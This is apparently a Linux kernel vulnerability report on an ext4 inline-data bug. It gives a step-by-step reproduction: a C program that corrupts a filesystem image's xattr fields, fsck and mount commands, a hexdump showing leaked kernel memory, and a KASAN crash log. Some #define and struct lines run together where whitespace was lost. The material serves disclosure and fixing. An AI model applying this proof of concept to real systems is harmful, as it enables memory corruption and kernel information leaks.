1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 |
ext4 can store data for small regular files as "inline data", meaning that the data is stored inside the corresponding inode instead of in separate blocks. Inline data is stored in two places: The first 60 bytes go in the i_block field in the inode (which normally contains a list of blocks instead), the rest goes in the special filesystem-internal extended attribute "system.data". Since commit e50e5129f384 ("ext4: xattr-in-inode support", in v4.13+), ext4 can store extended attribute values not only inline in the inode, but can also store such values in dedicated inodes. When a corrupted filesystem stores the system.data extended attribute value in a dedicated inode, the kernel gets confused, causing memory corruption. ext4_find_inline_data_nolock() attempts to locate an inode's inline data by searching for the system.data xattr using ext4_xattr_ibody_find(). If the inode has xattrs, ext4_xattr_ibody_find() first checks them for corruption using xattr_check_inode(), then grabs the wanted xattr using xattr_find_entry(). xattr_check_inode() uses ext4_xattr_check_entries() to check the individual xattrs, but skips most checks if <code>entry->e_value_inum != 0</code> (marking an xattr whose value is in a dedicated inode) - only for inline values, length and offset checks are performed to ensure that the value actually fits into the inode. The problem is that ext4_find_inline_data_nolock() then assumes that the returned xattr uses inline storage and that the returned length will fit into the inode; it stores the length field from the xattr in EXT4_I(inode)->i_inline_size</code> without further checks. Later, when the file is read, ext4_read_inline_data() trusts this length value, causing an out-of-bounds memcpy() in the following line: memcpy(buffer, (void *)IFIRST(header) + le16_to_cpu(entry->e_value_offs), len); To reproduce, on a system with kernel v4.13 or newer, ideally with KASAN on: 1. Create a new ext4 filesystem image, with 256-byte inodes and inline data support: $ mkfs.ext4 -b 4096 -I 256 -O inline_data testfs.img 400k mke2fs 1.43.7 (16-Oct-2017) Creating regular file testfs.img Filesystem too small for a journal Creating filesystem with 100 4k blocks and 64 inodes Allocating group tables: done Writing inode tables: done Writing superblocks and filesystem accounting information: done 2. Create a 75-byte file in the new filesystem: $ mkdir mount $ sudo mount testfs.img mount $ sudo dd bs=75 count=1 if=/dev/zero of=mount/testfile 1+0 records in 1+0 records out 75 bytes copied, 0.000811554 s, 92.4 kB/s $ sudo umount mount 3. Bump up the inode size, bump up the xattr size, and mark the xattr value as non-inline: $ cat fixup.c #include <stdint.h> #include <fcntl.h> #include <err.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <sys/stat.h> #define __le16 uint16_t #define __le32 uint32_t #define __u16 uint16_t #define __u32 uint32_t #define __u8 uint8_t /* some definitions from kernel headers */ #define EXT4_NDIR_BLOCKS12 #define EXT4_IND_BLOCKEXT4_NDIR_BLOCKS #define EXT4_DIND_BLOCK (EXT4_IND_BLOCK + 1) #define EXT4_TIND_BLOCK (EXT4_DIND_BLOCK + 1) #define EXT4_N_BLOCKS (EXT4_TIND_BLOCK + 1) #define EXT4_XATTR_MAGIC0xEA020000 struct ext4_inode { __le16i_mode; __le16i_uid; __le32i_size_lo; __le32i_atime; __le32i_ctime; __le32i_mtime; __le32i_dtime; __le16i_gid; __le16i_links_count; __le32i_blocks_lo; __le32i_flags; union { struct { __le32l_i_version; } linux1; } osd1; __le32i_block[EXT4_N_BLOCKS]; __le32i_generation; __le32i_file_acl_lo; __le32i_size_high; __le32i_obso_faddr; union { struct { __le16l_i_blocks_high; __le16l_i_file_acl_high; __le16l_i_uid_high; __le16l_i_gid_high; __le16l_i_checksum_lo; __le16l_i_reserved; } linux2; } osd2; __le16i_extra_isize; __le16i_checksum_hi; __le32i_ctime_extra; __le32i_mtime_extra; __le32i_atime_extra; __le32i_crtime; __le32i_crtime_extra; __le32i_version_hi; __le32i_projid; }; struct ext4_xattr_ibody_header { __le32h_magic; }; struct ext4_xattr_entry { __u8e_name_len; __u8e_name_index; __le16e_value_offs; __le32e_value_inum; __le32e_value_size; __le32e_hash; chare_name[0]; }; #define INODE_SIZE 256 #define ROUND_UP(x,round) ( ((x)+((round)-1)) & ~((round)-1) ) int main(int argc, char **argv) { char *path = argv[1]; int fd = open(path, O_RDWR); if (fd == -1) err(1, "open"); struct stat st; if (fstat(fd, &st)) err(1, "fstat"); char *map = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); if (map == MAP_FAILED) err(1, "mmap"); for (int i=0; i<st.st_size/INODE_SIZE; i++) { struct ext4_inode *ino = (void*)(map + i * INODE_SIZE); if (ino->i_links_count != 1 || ino->i_size_lo != 75) continue; printf("found inode (idx=%d, size=%u, mode=%ho)\n", i, ino->i_size_lo, ino->i_mode); ino->i_size_lo = 60000; printf("i_extra_isize = %hu\n", ino->i_extra_isize); struct ext4_xattr_ibody_header *hdr = (void*)( ((char*)ino)+128+ino->i_extra_isize ); if (hdr->h_magic != EXT4_XATTR_MAGIC) continue; struct ext4_xattr_entry *entry = (void*)(hdr+1); while (*(uint32_t*)entry != 0) { printf("attr: idx=%hhu name='%*s' offs=%hu inum=%u size=%u\n", entry->e_name_index, entry->e_name_len, entry->e_name, entry->e_value_offs, entry->e_value_inum, entry->e_value_size); entry->e_value_offs = 0; entry->e_value_inum = 20; entry->e_value_size = 60000; entry = (void*)( (char*)entry + sizeof(*entry) + ROUND_UP(entry->e_name_len, 4) ); } } } $ gcc -o fixup fixup.c -Wall $ ./fixup testfs.img found inode (idx=555, size=75, mode=100644) i_extra_isize = 32 attr: idx=7 name='data' offs=76 inum=0 size=15 4. Use fsck to fix up the inode checksum (but don't let it fix anything else!): $ fsck.ext4 -f testfs.img e2fsck 1.43.7 (16-Oct-2017) Pass 1: Checking inodes, blocks, and sizes Inode 12 has INLINE_DATA_FL flag but extended attribute not found.Truncate<y>? no Extended attribute in inode 12 has a value size (60000) which is invalid Clear<y>? no Inode 12 passes checks, but checksum does not match inode.Fix<y>? yes Pass 2: Checking directory structure Pass 3: Checking directory connectivity Pass 4: Checking reference counts Pass 5: Checking group summary information testfs.img: ***** FILE SYSTEM WAS MODIFIED ***** testfs.img: ********** WARNING: Filesystem still has errors ********** testfs.img: 12/64 files (0.0% non-contiguous), 13/100 blocks 5. Mount the filesystem again: $ sudo mount testfs.img mount 6. Read the file: $ hexdump -C mount/testfile 0000000000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00|................| * 0000003000 00 00 00 00 00 00 0000 00 00 00 04 07 00 00|................| 0000004014 00 00 00 60 ea 00 0000 00 00 00 64 61 74 61|....`.......data| 0000005000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00|................| * 000004a031 00 00 00 00 00 00 00e0 d1 fc 98 d7 7f 00 00|1...............| 000004b0e0 07 03 99 d7 7f 00 0000 00 00 00 00 00 00 00|................| 000004c000 00 00 00 00 00 00 00e0 5f 00 00 00 00 00 00|........._......| 000004d064 00 00 00 00 00 00 00f0 af 02 99 d7 7f 00 00|d...............| 000004e000 00 00 00 00 00 00 0000 00 00 00 00 00 00 00|................| [...] 7. Check dmesg: $ dmesg [...] [ 3211.552729] ================================================================== [ 3211.552782] BUG: KASAN: use-after-free in ext4_read_inline_data+0x114/0x120 [ext4] [ 3211.552787] Write of size 59940 at addr ffff8802ba1d003c by task pool/12922 [ 3211.552796] CPU: 3 PID: 12922 Comm: pool Not tainted 4.17.0-rc4+ #7 [ 3211.552798] Hardware name: LENOVO 20FCS12V06/20FCS12V06, BIOS N1FET43W (1.17 ) 08/02/2016 [ 3211.552799] Call Trace: [ 3211.552807]dump_stack+0x71/0xab [ 3211.552813]print_address_description+0x6a/0x250 [ 3211.552817]kasan_report+0x258/0x380 [ 3211.552863]? ext4_read_inline_data+0x114/0x120 [ext4] [ 3211.552867]memcpy+0x34/0x50 [ 3211.552914]ext4_read_inline_data+0x114/0x120 [ext4] [ 3211.552961]ext4_read_inline_page+0x1e4/0x2a0 [ext4] [ 3211.553006]? ext4_read_inline_data+0x120/0x120 [ext4] [ 3211.553053]ext4_readpage_inline+0x13e/0x160 [ext4] [ 3211.553101]ext4_readpage+0xf5/0x110 [ext4] [ 3211.553106]generic_file_read_iter+0x9a4/0xea0 [ 3211.553112]? filemap_range_has_page+0x160/0x160 [ 3211.553116]? save_stack+0x89/0xb0 [ 3211.553120]? __kasan_slab_free+0x105/0x150 [ 3211.553124]? aa_path_link+0x1f0/0x1f0 [ 3211.553128]? do_syscall_64+0x150/0x160 [ 3211.553132]? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 3211.553137]? audit_watch_compare+0x1b/0x50 [ 3211.553142]__vfs_read+0x239/0x340 [ 3211.553145]? __x64_sys_copy_file_range+0x2d0/0x2d0 [ 3211.553149]? dput.part.19+0x2e/0x1b0 [ 3211.553154]? auditd_test_task+0x43/0x60 [ 3211.553158]vfs_read+0xa5/0x190 [ 3211.553162]ksys_read+0xa1/0x120 [ 3211.553166]? kernel_write+0xa0/0xa0 [ 3211.553171]do_syscall_64+0x6d/0x160 [ 3211.553175]entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 3211.553178] RIP: 0033:0x7f9ada1af72c [ 3211.553180] RSP: 002b:00007f9ac2258888 EFLAGS: 00000246 ORIG_RAX: 0000000000000000 [...] [ 3211.553197] The buggy address belongs to the page: [ 3211.553202] page:ffffea000ae87400 count:2 mapcount:0 mapping:ffff88021fe57898 index:0x0 [ 3211.553207] flags: 0x17fffc000000021(locked|lru) [ 3211.553213] raw: 017fffc000000021 ffff88021fe57898 0000000000000000 00000002ffffffff [ 3211.553219] raw: ffffea000858fc20 ffff8803d0a204a0 0000000000000000 ffff8803cf31cac0 [ 3211.553222] page dumped because: kasan: bad access detected [ 3211.553224] page->mem_cgroup:ffff8803cf31cac0 [ 3211.553229] Memory state around the buggy address: [ 3211.553234]ffff8802ba1d0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 3211.553238]ffff8802ba1d0f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 3211.553243] >ffff8802ba1d1000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 3211.553246]^ [ 3211.553250]ffff8802ba1d1080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 3211.553254]ffff8802ba1d1100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 3211.553257] ================================================================== |